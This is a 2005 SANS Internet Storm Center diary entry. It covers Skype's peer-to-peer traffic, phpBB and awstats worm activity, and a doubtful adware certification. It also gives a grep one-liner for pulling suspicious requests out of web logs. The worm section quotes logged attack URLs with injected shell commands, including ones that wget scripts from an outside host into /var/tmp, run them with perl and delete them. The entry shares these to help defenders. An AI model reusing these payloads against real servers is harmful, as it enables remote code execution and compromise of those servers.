Threat Level: green Handler on Duty: Remco Verhoef

SANS ISC: Skype; Grepping Weblogs; COAST; ISTS News

SANS Site Network

Current Site

SANS Internet Storm Center

Other SANS Sites Help

Graduate Degree Programs

Security Training

Security Certification

Security Awareness Training

Penetration Testing

Industrial Control Systems

Cyber Defense Foundations

DFIR

Software Security

Government OnSite Training

SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Log In or Sign Up for Free!

Skype; Grepping Weblogs; COAST; ISTS News
Skype Paul wrote about his firewall dropping a "huge amount" of packets after Skype was installed on a host behind the firewall. He suspected a backdoored version. Skype, a very popular Voice over IP (VoIP) application, does show this behavior as a result of its normal operation. As explained here http://www.skype.com/products/explained.html , Skype is a Peer to Peer application very much like Napster and others. In order to relay the voice data, it establishes connections with numerous peers, and will relay traffic for these peers even if you are not "on the phone". phpBB worms (and awstat exploits) We continue to receive reports about various phpBB worms. The worms attack various vulnerabilities, some of them are older. More recent worms will just check random URLs, not limiting themselves to well known phpBB pages like 'viewfiles'. awstats, another web application with vulnerabilities released recently, is another favorite. Here a quick 'grep' result from our own ISC web server: I am using this line of shell code to extract requests of interest: cut -d'"' -f2 < access_log \| cut -f2 -d' ' \| grep ';' Some highlights: /cgi-bin/awstats.pl?configdir=\|echo%20;echo%20;id;echo%20;echo\| /diary.php?date=2004-12-25&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F %3B%20cd%20/var/tmp;wget%20www.panahi.com/frame3.txt; wget%20www.panahi.com/frame2.txt;perl%20frame3.txt;rm%20frame3.txt; perl%20frame2.txt;rm%20frame2.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F &highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45 %54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; /diary.php?date=2004-12-25&rush=echo%20_START_%3B%20cd%20/var/tmp; wget%20www.panahi.com/frame3.txt;wget%20www.panahi.com/frame2.txt; perl%20frame3.txt;rm%20frame3.txt;perl%20frame2.txt;rm%20frame2.txt%3B %20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527'; adding a quick 'sort -u \| wc -l ' to the grep above suggests 45 unique attempts. Note that some of the URL hit look like they where extracted from links found on other sites, and modified to insert the exploit. COAST In a past diary, we published excerpts from an offer made by a Spyware/Adware company. This letter was directed to a game software developer and included a note that the Adware maker has hopes of obtaining a "COAST Certification". COAST was originally founded as an anti Spy/Adware organization, but has come under some scrutiny recently, as reader Robert pointed out. As usual, buywer beware. Flashy "seals" may not only be just outright fake, but in some cases you have to look deeper to figure out what they are actually worth ISTS News A couple alert readers noticed that the ISTS news are missing. ISTS changed its format, and the news will be back as soon as the new parser is working. ---------- Johannes Ullrich jullrich_ATT_sans.org, CTO SANS Internet Storm Center ------------ http://johannes.homepc.org/blog I will be teaching next: Defending Web Applications Security Essentials - SANS Silicon Valley - Cupertino 2020	Johannes 3845 Posts ISC Handler
Subscribe	Mar 3rd 2005 1 decade ago

Sign Up for Free or Log In to start participating in the conversation!